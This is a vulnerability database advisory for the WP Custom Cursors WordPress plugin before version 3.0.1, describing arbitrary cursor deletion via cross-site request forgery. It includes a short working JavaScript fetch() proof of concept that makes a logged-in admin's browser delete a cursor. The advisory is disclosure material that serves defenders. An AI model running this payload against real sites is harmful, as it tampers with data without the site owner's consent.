Lucene search
+L

WP Custom Cursors < 3.0.1 - Arbitrary Cursor Deletion via CSRF

🗓️ 21 Sep 2022 00:00:00Reported by Lana CodesType 
wpexploit
 wpexploit
👁 429 Views

WP Custom Cursors Arbitrary Cursor Deletion via CSR

Related
Code
Make a logged in admin open a page with the following JS code:

fetch('https://example.com/wp-admin/admin.php?page=wp_custom_cursors', { 
method: 'POST', 
headers: new Headers({ 
'Content-Type': 'application/x-www-form-urlencoded', 
}), 
body: 'submit&delete_row=1' 
}).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

This will make them delete the cursor with ID 1

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Oct 2022 07:51Current
1.4Low risk
Vulners AI Score1.4
CVSS 3.14.3
EPSS0.00283
SSVC
429